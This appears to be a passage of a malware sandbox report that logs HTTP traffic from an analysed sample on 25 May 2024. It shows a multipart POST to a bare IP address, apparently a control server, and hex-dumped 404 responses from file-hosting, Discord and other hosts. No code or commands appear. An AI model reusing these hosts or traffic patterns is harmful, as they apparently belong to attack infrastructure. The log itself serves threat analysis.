HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 278Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Sat, 25 May 2024 19:29:44 GMTalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 25 May 2024 19:29:54 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://nessotechbd.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingX-Endurance-Cache-Level: 2Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 25 May 2024 19:30:24 GMTServer: Transfer.sh HTTP Server 1.0Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffX-Made-With: <3 by DutchCodersX-Served-By: Proudly served by DutchCodersContent-Length: 15Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 25 May 2024 19:30:32 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=_hnx.RasMHd9rAKtQBpiugUN70R9RGSs0a3As8OUYhs-1716665432-1.0.1.1-LMEPxQarqfdvcfblA_as1y5sxEH7NpD4UFtDd9qLMmuZeJm.LuMhukMUSc4NN_d8ONEJPfSM15yZZ1hUjlei.Q; path=/; expires=Sat, 25-May-24 20:00:32 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0dKLbD%2BiyBGP73Z6bVXwH%2FG%2Bkvxq4AAiW14%2B17Gxsui30bAluOyYJUaKH6oYX1Kk%2B8GVcwAawVDDol1JlKjRwOtU6Mk71NnR1SRRLlIZVKwhEypcR2qOzQXUpOmOBanOgPgThg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=pE84G.l23IqgyDRvhY6ciPU_hh1g3L9g.guRFnWtMhM-1716665432343-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8897f0c81c3478e2-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 38 0d 0a 04 00 00 00 79 fa f7 1c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82O@c^`_S10
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 90 51 10 25 01 f1 a0 89 b3 bf 05 ab 11 df 76 be 59 51 96 01 bf ea 26 ed 65 5e 12 b3 f2 92 4a f5 04 0d 0a 30 0d 0a 0d 0a Data Ascii: 35I:82OQ%vYQ&e^J0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
